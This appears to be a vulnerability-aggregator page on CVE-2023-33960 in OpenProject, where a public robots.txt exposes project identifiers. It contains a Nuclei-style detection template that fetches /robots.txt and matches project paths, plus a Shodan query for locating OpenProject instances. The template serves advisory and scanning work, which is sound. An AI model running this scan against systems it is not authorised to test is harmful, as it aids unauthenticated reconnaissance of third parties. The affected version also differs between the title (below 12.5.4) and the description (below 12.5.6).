CVE-2023-33960: OpenProject < 12.5.4 - Project Identifiers Exposure

日期: 2026-01-16 | 影响软件: OpenProject | POC: 已公开

漏洞描述

OpenProject versions before 12.5.6 generate a publicly accessible robots.txt file revealing project identifiers, even if the instance is set to 'Login required', letting attackers gather project info, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2023-33960

info:
  name: OpenProject < 12.5.4 - Project Identifiers Exposure
  author: 0x_Akoko
  severity: medium
  description: |
    OpenProject versions before 12.5.6 generate a publicly accessible robots.txt file revealing project identifiers, even if the instance is set to 'Login required', letting attackers gather project info, exploit requires no authentication.
  impact: |
    Attackers can enumerate project identifiers, potentially aiding targeted attacks or information gathering.
  remediation: |
    Upgrade to version 12.5.6 or later, or apply the provided patch to versions above 10.0.
  reference:
    - https://www.openproject.org/docs/release-notes/12-5-4/
    - https://github.com/opf/openproject/security/advisories/GHSA-4r3x-x7xf-h2gc
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33960
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-33960
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"OpenProject"
  tags: cve,cve2023,openproject,exposure,api

http:
  - method: GET
    path:
      - "{{BaseURL}}/robots.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Disallow: /projects/")'
          - 'contains_any(body, "/work_packages", "/repository", "/activity")'
        condition: and
# digest: 4a0a00473045022100a54702182425096aace40b33db3299d1adf113b0a58f097dff4fe19af8f792c702202711aef16b4d2c4cd186f859bd72004d324e06ab5b1ce33a2f2f64c25793fbb7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐